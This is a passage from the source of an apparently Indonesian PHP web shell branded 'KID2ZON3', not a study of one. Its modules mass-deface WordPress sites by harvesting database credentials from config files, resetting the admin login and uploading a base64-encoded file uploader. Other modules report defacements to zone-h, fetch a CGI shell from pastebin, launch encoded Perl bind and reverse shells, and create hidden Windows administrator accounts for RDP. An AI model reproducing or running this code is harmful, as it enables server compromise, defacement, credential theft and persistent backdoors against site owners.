2086. echo "<font color=lime>sukses di ganti.</font><br>";
2087. }
2088. echo "</div>";
2089. mysql_close($conn);
2090. }
2091. }
2092. } else {
2093. echo "<center>
2094. <h1>Auto Edit Title+Content WordPress</h1>
2095. <form method='post'>
2096. DIR Config: <br>
2097. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2098. Set Title: <br>
2099. <input type='text' name='new_title' value='Hacked by KID2ZON3' placeholder='New Title'><br><br>
2100. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
2101. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
2102. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
2103. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
2104. </form>
2105. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2106. ";
2107. }
2108. } elseif($_GET['do'] == 'zoneh') {
2109. if($_POST['submit']) {
2110. $domain = explode("\r\n", $_POST['url']);
2111. $nick = $_POST['nick'];
2112. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
2113. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
2114. function zoneh($url,$nick) {
2115. $ch = curl_init("http://www.zone-h.com/notify/single");
2116. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2117. curl_setopt($ch, CURLOPT_POST, true);
2118. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
2119. return curl_exec($ch);
2120. curl_close($ch);
2121. }
2122. foreach($domain as $url) {
2123. $zoneh = zoneh($url,$nick);
2124. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
2125. echo "$url -> <font color=lime>OK</font><br>";
2126. } else {
2127. echo "$url -> <font color=red>ERROR</font><br>";
2128. }
2129. }
2130. } else {
2131. echo "<center><form method='post'>
2132. <u>Defacer</u>: <br>
2133. <input type='text' name='nick' size='50' value='KID2ZON3'><br>
2134. <u>Domains</u>: <br>
2135. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
2136. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
2137. </form>";
2138. }
2139. echo "</center>";
2140. } elseif($_GET['do'] == 'cgi') {
2141. $cgi_dir = mkdir('hgt_cgi', 0755);
2142. $file_cgi = "hgt_cgi/cgi.izo";
2143. $isi_htcgi = "AddHandler cgi-script .izo";
2144. $htcgi = fopen(".htaccess", "w");
2145. fwrite($htcgi, $isi_htcgi);
2146. fclose($htcgi);
2147. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
2148. $cgi = fopen($file_cgi, "w");
2149. fwrite($cgi, $cgi_script);
2150. fclose($cgi);
2151. chmod($file_cgi, 0755);
2152. echo "<iframe src='hgt_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
2153. } elseif($_GET['do'] == 'fake_root') {
2154. ob_start();
2155. $cwd = getcwd();
2156. $ambil_user = explode("/", $cwd);
2157. $user = $ambil_user[2];
2158. if($_POST['reverse']) {
2159. $site = explode("\r\n", $_POST['url']);
2160. $file = $_POST['file'];
2161. foreach($site as $url) {
2162. $cek = getsource("$url/~$user/$file");
2163. if(preg_match("/hacked/i", $cek)) {
2164. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
2165. }
2166. }
2167. } else {
2168. echo "<center><form method='post'>
2169. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
2170. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
2171. Domain: <br>
2172. <textarea style='width: 450px; height: 250px;' name='url'>";
2173. reverse($_SERVER['HTTP_HOST']);
2174. echo "</textarea><br>
2175. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
2176. </form><br>
2177. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
2178. }
2179. } elseif($_GET['do'] == 'adminer') {
2180. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2181. function adminer($url, $isi) {
2182. $fp = fopen($isi, "w");
2183. $ch = curl_init();
2184. curl_setopt($ch, CURLOPT_URL, $url);
2185. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2186. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2187. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2188. curl_setopt($ch, CURLOPT_FILE, $fp);
2189. return curl_exec($ch);
2190. curl_close($ch);
2191. fclose($fp);
2192. ob_flush();
2193. flush();
2194. }
2195. if(file_exists('adminer.php')) {
2196. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2197. } else {
2198. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
2199. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2200. } else {
2201. echo "<center><font color=red>gagal buat file adminer</font></center>";
2202. }
2203. }
2204. } elseif($_GET['do'] == 'auto_dwp') {
2205. if($_POST['auto_deface_wp']) {
2206. function anucurl($sites) {
2207. $ch = curl_init($sites);
2208. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2209. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2210. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2211. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2212. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2213. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2214. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2215. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2216. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2217. $data = curl_exec($ch);
2218. curl_close($ch);
2219. return $data;
2220. }
2221. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2222. $post = array(
2223. "log" => "$userr",
2224. "pwd" => "$pass",
2225. "rememberme" => "forever",
2226. "wp-submit" => "$wp_submit",
2227. "redirect_to" => "$web",
2228. "testcookie" => "1",
2229. );
2230. $ch = curl_init($cek);
2231. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2232. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2233. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2234. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2235. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2236. curl_setopt($ch, CURLOPT_POST, 1);
2237. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2238. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2239. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2240. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2241. $data = curl_exec($ch);
2242. curl_close($ch);
2243. return $data;
2244. }
2245. $scan = $_POST['link_config'];
2246. $link_config = scandir($scan);
2247. $script = htmlspecialchars($_POST['script']);
2248. $user = "KID2ZON3";
2249. $pass = "KID2ZON3";
2250. $passx = md5($pass);
2251. foreach($link_config as $dir_config) {
2252. if(!is_file("$scan/$dir_config")) continue;
2253. $config = file_get_contents("$scan/$dir_config");
2254. if(preg_match("/WordPress/", $config)) {
2255. $dbhost = ambilkata($config,"DB_HOST', '","'");
2256. $dbuser = ambilkata($config,"DB_USER', '","'");
2257. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2258. $dbname = ambilkata($config,"DB_NAME', '","'");
2259. $dbprefix = ambilkata($config,"table_prefix = '","'");
2260. $prefix = $dbprefix."users";
2261. $option = $dbprefix."options";
2262. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2263. $db = mysql_select_db($dbname);
2264. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2265. $result = mysql_fetch_array($q);
2266. $id = $result[ID];
2267. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2268. $result2 = mysql_fetch_array($q2);
2269. $target = $result2[option_value];
2270. if($target == '') {
2271. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2272. } else {
2273. echo "[+] $target <br>";
2274. }
2275. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2276. if(!$conn OR !$db OR !$update) {
2277. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2278. mysql_close($conn);
2279. } else {
2280. $site = "$target/wp-login.php";
2281. $site2 = "$target/wp-admin/theme-install.php?upload";
2282. $b1 = anucurl($site2);
2283. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2284. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2285. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2286. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2287. $www = "m.php";
2288. $fp5 = fopen($www,"w");
2289. fputs($fp5,$upload3);
2290. $post2 = array(
2291. "_wpnonce" => "$anu2",
2292. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2293. "themezip" => "@$www",
2294. "install-theme-submit" => "Install Now",
2295. );
2296. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2297. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2298. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2299. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2300. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2301. curl_setopt($ch, CURLOPT_POST, 1);
2302. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2303. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2304. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2305. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2306. $data3 = curl_exec($ch);
2307. curl_close($ch);
2308. $y = date("Y");
2309. $m = date("m");
2310. $namafile = "id.php";
2311. $fpi = fopen($namafile,"w");
2312. fputs($fpi,$script);
2313. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2314. curl_setopt($ch6, CURLOPT_POST, true);
2315. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2316. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2317. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2318. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2319. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2320. $postResult = curl_exec($ch6);
2321. curl_close($ch6);
2322. $as = "$target/k.php";
2323. $bs = anucurl($as);
2324. if(preg_match("#$script#is", $bs)) {
2325. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2326. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2327. } else {
2328. echo "[-] <font color='red'>gagal mepes...</font><br>";
2329. echo "[!!] coba aja manual: <br>";
2330. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2331. echo "[+] username: <font color=lime>$user</font><br>";
2332. echo "[+] password: <font color=lime>$pass</font><br><br>";
2333. }
2334. mysql_close($conn);
2335. }
2336. }
2337. }
2338. } else {
2339. echo "<center><h1>WordPress Auto Deface</h1>
2340. <form method='post'>
2341. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2342. <input type='text' name='script' height='10' size='50' placeholder='Hacked by KID2ZON3' required><br>
2343. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2344. </form>
2345. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
2346. </center>";
2347. }
2348. } elseif($_GET['do'] == 'auto_dwp2') {
2349. if($_POST['auto_deface_wp']) {
2350. function anucurl($sites) {
2351. $ch = curl_init($sites);
2352. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2353. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2354. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2355. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2356. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2357. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2358. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2359. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2360. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2361. $data = curl_exec($ch);
2362. curl_close($ch);
2363. return $data;
2364. }
2365. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2366. $post = array(
2367. "log" => "$userr",
2368. "pwd" => "$pass",
2369. "rememberme" => "forever",
2370. "wp-submit" => "$wp_submit",
2371. "redirect_to" => "$web",
2372. "testcookie" => "1",
2373. );
2374. $ch = curl_init($cek);
2375. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2376. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2377. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2378. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2379. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2380. curl_setopt($ch, CURLOPT_POST, 1);
2381. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2382. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2383. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2384. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2385. $data = curl_exec($ch);
2386. curl_close($ch);
2387. return $data;
2388. }
2389. $link = explode("\r\n", $_POST['link']);
2390. $script = htmlspecialchars($_POST['script']);
2391. $user = "KID2ZON3";
2392. $pass = "KID2ZON3";
2393. $passx = md5($pass);
2394. foreach($link as $dir_config) {
2395. $config = anucurl($dir_config);
2396. $dbhost = ambilkata($config,"DB_HOST', '","'");
2397. $dbuser = ambilkata($config,"DB_USER', '","'");
2398. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2399. $dbname = ambilkata($config,"DB_NAME', '","'");
2400. $dbprefix = ambilkata($config,"table_prefix = '","'");
2401. $prefix = $dbprefix."users";
2402. $option = $dbprefix."options";
2403. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2404. $db = mysql_select_db($dbname);
2405. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2406. $result = mysql_fetch_array($q);
2407. $id = $result[ID];
2408. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2409. $result2 = mysql_fetch_array($q2);
2410. $target = $result2[option_value];
2411. if($target == '') {
2412. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2413. } else {
2414. echo "[+] $target <br>";
2415. }
2416. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2417. if(!$conn OR !$db OR !$update) {
2418. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2419. mysql_close($conn);
2420. } else {
2421. $site = "$target/wp-login.php";
2422. $site2 = "$target/wp-admin/theme-install.php?upload";
2423. $b1 = anucurl($site2);
2424. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2425. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2426. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2427. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2428. $www = "m.php";
2429. $fp5 = fopen($www,"w");
2430. fputs($fp5,$upload3);
2431. $post2 = array(
2432. "_wpnonce" => "$anu2",
2433. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2434. "themezip" => "@$www",
2435. "install-theme-submit" => "Install Now",
2436. );
2437. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2438. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2439. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2440. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2441. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2442. curl_setopt($ch, CURLOPT_POST, 1);
2443. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2444. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2445. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2446. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2447. $data3 = curl_exec($ch);
2448. curl_close($ch);
2449. $y = date("Y");
2450. $m = date("m");
2451. $namafile = "id.php";
2452. $fpi = fopen($namafile,"w");
2453. fputs($fpi,$script);
2454. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2455. curl_setopt($ch6, CURLOPT_POST, true);
2456. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2457. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2458. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2459. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2460. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2461. $postResult = curl_exec($ch6);
2462. curl_close($ch6);
2463. $as = "$target/k.php";
2464. $bs = anucurl($as);
2465. if(preg_match("#$script#is", $bs)) {
2466. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2467. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2468. } else {
2469. echo "[-] <font color='red'>gagal mepes...</font><br>";
2470. echo "[!!] coba aja manual: <br>";
2471. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2472. echo "[+] username: <font color=lime>$user</font><br>";
2473. echo "[+] password: <font color=lime>$pass</font><br><br>";
2474. }
2475. mysql_close($conn);
2476. }
2477. }
2478. } else {
2479. echo "<center><h1>WordPress Auto Deface V.2</h1>
2480. <form method='post'>
2481. Link Config: <br>
2482. <textarea name='link' placeholder='http://target.com/hgt_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2483. <input type='text' name='script' height='10' size='50' placeholder='Hacked by KID2ZON3' required><br>
2484. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2485. </form></center>";
2486. }
2487. } elseif($_GET['do'] == 'network') {
2488. echo "<form method='post'>
2489. <u>Bind Port:</u> <br>
2490. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2491. <input type='submit' name='sub_bp' value='>>'>
2492. </form>
2493. <form method='post'>
2494. <u>Back Connect:</u> <br>
2495. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
2496. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2497. <input type='submit' name='sub_bc' value='>>'>
2498. </form>";
2499. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2500. if(isset($_POST['sub_bp'])) {
2501. $f_bp = fopen("/tmp/bp.pl", "w");
2502. fwrite($f_bp, base64_decode($bind_port_p));
2503. fclose($f_bp);
2504.  
2505. $port = $_POST['port_bind'];
2506. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2507. sleep(1);
2508. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2509. unlink("/tmp/bp.pl");
2510. }
2511. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2512. if(isset($_POST['sub_bc'])) {
2513. $f_bc = fopen("/tmp/bc.pl", "w");
2514. fwrite($f_bc, base64_decode($bind_connect_p));
2515. fclose($f_bc);
2516.  
2517. $ipbc = $_POST['ip_bc'];
2518. $port = $_POST['port_bc'];
2519. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2520. sleep(1);
2521. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2522. unlink("/tmp/bc.pl");
2523. }
2524. } elseif($_GET['do'] == 'krdp_shell') {
2525. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2526. if($_POST['create']) {
2527. $user = htmlspecialchars($_POST['user']);
2528. $pass = htmlspecialchars($_POST['pass']);
2529. if(preg_match("/$user/", exe("net user"))) {
2530. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
2531. } else {
2532. $add_user = exe("net user $user $pass /add");
2533. $add_groups1 = exe("net localgroup Administrators $user /add");
2534. $add_groups2 = exe("net localgroup Administrator $user /add");
2535. $add_groups3 = exe("net localgroup Administrateur $user /add");
2536. echo "[ RDP ACCOUNT INFO ]<br>
2537. ------------------------------<br>
2538. IP: <font color=lime>".$ip."</font><br>
2539. Username: <font color=lime>$user</font><br>
2540. Password: <font color=lime>$pass</font><br>
2541. ------------------------------<br><br>
2542. [ STATUS ]<br>
2543. ------------------------------<br>
2544. ";
2545. if($add_user) {
2546. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
2547. } else {
2548. echo "[add user] -> <font color='red'>Gagal</font><br>";
2549. }
2550. if($add_groups1) {
2551. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
2552. } elseif($add_groups2) {
2553. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
2554. } elseif($add_groups3) {
2555. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
2556. } else {
2557. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2558. }
2559. echo "------------------------------<br>";
2560. }
2561. } elseif($_POST['s_opsi']) {
2562. $user = htmlspecialchars($_POST['r_user']);
2563. if($_POST['opsi'] == '1') {
2564. $cek = exe("net user $user");
2565. echo "Checking username <font color=lime>$user</font> ....... ";
2566. if(preg_match("/$user/", $cek)) {
2567. echo "[ <font color=lime>Sudah ada</font> ]<br>
2568. ------------------------------<br><br>
2569. <pre>$cek</pre>";
2570. } else {
2571. echo "[ <font color=red>belum ada</font> ]";
2572. }
2573. } elseif($_POST['opsi'] == '2') {
2574. $cek = exe("net user $user KID2ZON3");
2575. if(preg_match("/$user/", exe("net user"))) {
2576. echo "[change password: <font color=lime>KID2ZON3</font>] -> ";
2577. if($cek) {
2578. echo "<font color=lime>Berhasil</font>";
2579. } else {
2580. echo "<font color=red>Gagal</font>";
2581. }
2582. } else {
2583. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2584. }
2585. } elseif($_POST['opsi'] == '3') {
2586. $cek = exe("net user $user /DELETE");
2587. if(preg_match("/$user/", exe("net user"))) {
2588. echo "[remove user: <font color=lime>$user</font>] -> ";
2589. if($cek) {
2590. echo "<font color=lime>Berhasil</font>";
2591. } else {
2592. echo "<font color=red>Gagal</font>";
2593. }
2594. } else {
2595. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2596. }
2597. } else {
2598. //
2599. }
2600. } else {
2601. echo "-- Create RDP --<br>
2602. <form method='post'>
2603. <input type='text' name='user' placeholder='username' value='KID2ZON3' required>
2604. <input type='text' name='pass' placeholder='password' value='KID2ZON3' required>
2605. <input type='submit' name='create' value='>>'>
2606. </form>
2607. -- Option --<br>
2608. <form method='post'>
2609. <input type='text' name='r_user' placeholder='username' required>
2610. <select name='opsi'>
2611. <option value='1'>Cek Username</option>
2612. <option value='2'>Ubah Password</option>
2613. <option value='3'>Hapus Username</option>
2614. </select>
2615. <input type='submit' name='s_opsi' value='>>'>
2616. </form>
2617. ";
2618. }
2619. } else {
2620. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2621. }
2622. } elseif($_GET['act'] == 'newfile') {
2623. if($_POST['new_save_file']) {
2624. $newfile = htmlspecialchars($_POST['newfile']);
2625. $fopen = fopen($newfile, "a+");
2626. if($fopen) {
2627. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2628. } else {
2629. $act = "<font color=red>permission denied</font>";
2630. }
2631. }
2632. echo $act;
2633. echo "<form method='post'>
2634. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2635. <input type='submit' name='new_save_file' value='Submit'>
2636. </form>";
2637. } elseif($_GET['act'] == 'newfolder') {
2638. if($_POST['new_save_folder']) {
2639. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2640. if(!mkdir($new_folder)) {
2641. $act = "<font color=red>permission denied</font>";
2642. } else {
2643. $act = "<script>window.location='?dir=".$dir."';</script>";
2644. }
2645. }
2646. echo $act;
2647. echo "<form method='post'>
2648. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2649. <input type='submit' name='new_save_folder' value='Submit'>
2650. </form>";
2651. } elseif($_GET['act'] == 'rename_dir') {
2652. if($_POST['dir_rename']) {
2653. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2654. if($dir_rename) {
2655. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2656. } else {
2657. $act = "<font color=red>permission denied</font>";
2658. }
2659. echo "".$act."<br>";
2660. }
2661. echo "<form method='post'>
2662. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
